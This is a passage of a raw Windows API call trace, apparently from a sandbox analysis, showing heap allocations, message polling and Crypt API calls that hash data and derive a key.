(in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.903] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.903] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.903] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.903] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.903] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.903] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.903] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.903] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.903] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.903] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.903] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.903] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.903] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.904] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.904] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.904] CryptCreateHash (in: hProv=0x6969c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0075.904] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.904] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.904] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.904] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.904] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0075.904] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.904] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.904] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.904] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.904] CryptHashData (hHash=0x6b89f8, pbData=0x6f96e8, dwDataLen=0x16, dwFlags=0x1) returned 1 [0075.904] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.904] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.904] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.904] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.904] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.904] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.904] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.904] CryptDeriveKey (in: hProv=0x6969c0, Algid=0x660e, hBaseData=0x6b89f8, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8b78) returned 1 [0075.904] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b450 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792238 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.907] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0075.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0075.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0075.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bb8 [0075.908] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8bb8 | out: hHeap=0x650000) returned 1 [0075.908] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.908] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0075.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0075.908] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76af70 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e348 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e0a8 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b000 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e228 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a970 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76acb8 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e450 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e0d8 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ab68 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e6f0 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e060 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a688 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e138 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e120 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.909] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b270 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.909] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0075.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0075.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 